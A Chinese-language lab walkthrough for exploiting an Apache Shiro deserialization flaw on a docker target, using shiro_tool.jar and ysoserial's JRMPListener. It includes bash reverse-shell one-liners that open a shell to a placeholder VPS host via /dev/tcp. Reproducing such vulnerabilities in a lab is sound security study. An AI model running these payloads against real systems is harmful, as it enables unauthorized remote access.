——————環境准備——————
目標靶機:10.11.10.108 //docker環境
攻擊機ip:無所謂
vpsip:192.168.14.222 //和靶機ip可通
1、 使用shior_tools.jar 直接對目標系統進行檢測,檢測完畢后會返回可執行操作,
下圖為 0:DNS記錄證明漏洞存在,1:使用JRMPClient反彈shell
java -cp shiro_tool.jar Shiro http://10.11.10.108:8081/login.jsp
java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp (更新了一個版本后啟動是這樣的)
2、選1讓輸入ip,這里的ip和端口是運行ysoserial_JRMPListener終端的ip和端口(暫不輸入)
3、使用ysoserial開啟端口,執行反彈命令
這里面的編碼的內容在步驟4。
java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 "編碼后bash命令"
坑一:CommonsCollection1-5 如果不反彈shell,換着使用
4、bash反彈命令編輯
http://www.jackson-t.ca/runtime-exec-payloads.html //編碼的鏈接
下面三種執行命令,酌情選擇:
坑二:這里執行的bash命令,首先要看對方運行系統,如果是linxu下面三個換着試,如果是win另行百度反彈命令。
bash -i >& /dev/tcp/VPSIP/7777 0>&1
/bin/bash -i > /dev/tcp/VPSIP/7777 0<&1 2>&1
0<&196;exec 196<>/dev/tcp/VPSIP/7777; sh <&196 >&196 2>&196
這里選擇第二種,ip:是接受shell的vps的ip,端口:是vps用nc開啟監聽反彈到的端口
5、nc監聽
6、輸入接收shell的vps的ip和java-ysoserial-JRMPListener開啟的端口
7、執行成功,反彈shell
參考鏈接:
https://www.cnblogs.com/peterpan0707007/p/11342997.html
https://blog.csdn.net/qq_40989258/article/details/98206730
https://mp.weixin.qq.com/s/dJnWPP5Bpb2H6Y2kU1x4Lg
http://www.dnslog.cn/